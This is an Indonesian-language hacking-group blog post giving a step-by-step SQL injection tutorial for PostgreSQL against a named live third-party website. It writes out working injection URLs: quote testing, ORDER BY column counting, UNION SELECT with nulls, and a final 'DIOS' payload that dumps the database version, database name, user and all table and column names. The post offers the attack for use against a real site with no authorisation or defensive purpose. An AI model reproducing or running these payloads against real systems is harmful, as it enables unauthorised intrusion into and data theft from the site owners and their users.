input license here

Report Abuse

Search This Blog

Featured Post

Download Aplikasi DroidSQLI Mods v1.0

Assalamualaikum,halo pengunjung selamat datang di blog Bomber Cyber Army, pada artikel kali ini saya akan memberikan Download Aplikasi DroidSQLi Mods v1.0. Droid SQLI DroidSQLi adalah aplikasi yang sangat mengagumkan dan sempurna untuk meretas dan m…

SQLI Postgre


oke guys saya ./numb_404 mau ngisi materi ya !

iya lah materi, masa iya mau ngisi hati kamu, shaatt:v


oke tanpa berlama lama saya mau membahas tentang (SQLi Postgre) Mengenal SQLi Postgre tidak jauh beda dengan "SQLi Oracle"


tanpa banyak berbacot riya mari kita ke materinya !

live target => http://www.tyubusuiki.com/webpage.php?gid=14

Saya sudah siapkan live target yaa ! 

nah langkah awal seperti biasa kita ke DH Hackbar, lalu masukkan targetnya

http://www.tyubusuiki.com/webpage.php?gid=14

nah Tampilan awalnya seperti ini ya guys (teliti) 

oke mari kita inject, 
http://www.tyubusuiki.com/webpage.php?gid=1
pada web coba kita cek vuln atau tidak dengan menggunakan tanda petik (') 

jadinya seperti ini
=> http://www.tyubusuiki.com/webpage.php?gid=14'

dan seperti ini tampilannya
=>
ada banyak warning (peringatan),

 nah tandai aja guys kalo ada web yang ada warningnya, kalo ga SQLi Oracle ya sudah pasti SQLi Postgre
LANJUTT

coba kita kasih --+- (PENGERTIAN)=> (--+-) itu berguna untuk normalin web yang error setelah diberikan tanda petik tadi (')
jadinya seperti ini 
=> http://www.tyubusuiki.com/webpage.php?gid=14'--+-

dan tampilan webnya seperti ini
Loh kok tampilannya sama aja?
loh kok tampilannya masih error?

yups emang masih error jadi pengertiannya gini=>
{{{PENGERTIAN}}}
=> tidak semua web bisa diinject saat web menggunakan / diberi tanda petik (') diparam

=> lalu caranya agar bisa normal yaitu, kita coba hapus tanda petik (') diparam, jadinya seperti ini.
=>http://www.tyubusuiki.com/webpage.php?gid=14--+-

lihat tampilan webnya normal
Oke kita lanjut ORDER BY
(KEGUNAAN ORDER BY)
ORDER BY berguna untuk menghitung angka NORMAL / ERROR nya sebuah web
contoh pada web yang telah diberikan ORDER BY,
CONTOH=> php?id=23' ORDER BY 9--+- (normal)
CONTOH=> php?id=23' ORDER BY 10--+- (error)
jadi angka targetnya adalah angka 9 karena angka sebelum error adalah angka 9
PAHAM ? OKE LANJUT

disini gue langsung ORDER BY aja
=> http://www.tyubusuiki.com/webpage.php?gid=14 ORDER BY 11--+- (normal)
=> http://www.tyubusuiki.com/webpage.php?gid=14 ORDER BY 12--+- (error)

bedakan tampilan angka 11 dengan angka 12
ini angka 11 (normal)
ini angka 12 (error)

OKE LANJUTT ! 
kita lanjut UNION SELECT
(((PENGETIAN)))
>>> KEGUNAAN UNION SELECT <<<
UNION SELECT biasanya berguna untuk memunculkan angka ajaib pada tampilan website, tapi untuk SQLi Postgre sangat berbeda dari SQLi yang lain terkecuali SQLi Oracle.
SQLi Postgre itu hampir sama dengan SQLi Oracle, bisa dibilang mereka 1,2 / 11,12 karena cara nginjectionsnya hampir sama namun hanya beda type dan cara kerja.
PAHAM ? OKE LANJUT.

lanjut UNION SELECT
nahh bedanya SQLi Postgre / Oracle dengan yang lain, yaitu menggunakan (null) null sendiri adalah pengganti dari angka 1,2,3 jika pakai null maka NULL,NULL,NULL
PAHAM ? LANJUT!

=> http://www.tyubusuiki.com/webpage.php?gid=14 AND 0 UNION SELECT null,null,null,null,null,null,null,null,null,null,null--+-
(kok error bang ?), oke seperti pembahasan sebelumnya walau bukan saya yang open materi tapi saya tau.
yaitu menggunakan angka dan sama dengan  1= di sebelum angka 0.

jadinya seperti ini
=> http://www.tyubusuiki.com/webpage.php?gid=14 AND 1=0 UNION SELECT null,null,null,null,null,null,null,null,null,null,null--+-
dan ini tampilannya
nahh itu tandanya normal walau webnya agak sedikit berbeda dari tampilan normal sebelum sebelumnya.
(PENJELASAN)
bedanya Pestgre dengan Oracle hanyalah, jika Oracle menggunakan (FROM+DUAL) pada akhir NULL.
tapi postgre tidak menggunakan (FROM+DUAL) itu adalah pengertian
PAHAM ? oke lanjut

=> http://www.tyubusuiki.com/webpage.php?gid=14 AND 1=0 UNION SELECT null,null,null,null,null,null,null,null,null,null,null--+-

nah disini kita itu mencari angka dari web nya, IBARATKAN kamu sedang mencari barang yang hilang pada saat mati lampu, yaitu dengan cara meraba.
(POSITIF YA ANJ, BUKAN MERABA ANU :v)

nahh caranya kita berikan version() / user() disetiap NULL hingga menemukan apa yang kita cari.
CONTOH=> null,null,null,null,null,null,null--+-
nahh kita cek pakai version() / user()
jadinya seperti ini

=>version(),null,null,null,null,null,null--+-
jika tidak menemukan lanjut ke null selanjutnya
null,version(),null,null,null,null,null--+-
sampai angka yang di targetkan benar-benar jumpa.

SKIP
jadi saya menemukan angkanya di angka null terakhir yaitu 11 dengan menggunakan version()
lihat gambarnya bre
oke lanjut ke dios postgre, setiap type web yang berbeda memiliki dios yang berbeda juga.

Concat($${ ./numb_404 }$$,$$<br>$$,$$VERSION :: $$,version(),$$<br>$$,$$DATABASE ::$$,current_database(),$$<br>$$,$$USER :: $$,current_user,$$<br>$$,$$<br>$$,(SELECT+ARRAY_TO_STRING(ARRAY_AGG(concat(table_name,$$::$$,column_name)::TEXT),$$<li>$$)FROM+information_schema.columns+WHERE+table_schema+NOT+in($$information_schema$$,$$pg_catalog$$)))

mwehehehe jadinya begini

http://www.tyubusuiki.com/webpage.php?gid=14 AND 1=0 UNION SELECT null,null,null,null,null,null,null,null,null,null,Concat($${ ./numb_404 }$$,$$<br>$$,$$VERSION :: $$,version(),$$<br>$$,$$DATABASE ::$$,current_database(),$$<br>$$,$$USER :: $$,current_user,$$<br>$$,$$<br>$$,(SELECT+ARRAY_TO_STRING(ARRAY_AGG(concat(table_name,$$::$$,column_name)::TEXT),$$<li>$$)FROM+information_schema.columns+WHERE+table_schema+NOT+in($$information_schema$$,$$pg_catalog$$)))--+-

Oke done

Sekian materi nya

Silahkan belajar dan semoga bermanfaat 

Visit terus blog Bomber-Cyber-Army krna akan ada new materi yg bermanfaat bagi kalian

Materi by = ./numb_404

Support materi by = SABOTASE SINDYCATE TEAM & ALL MEM BOMBER-CYBER-ARMY

Related Posts

2 comments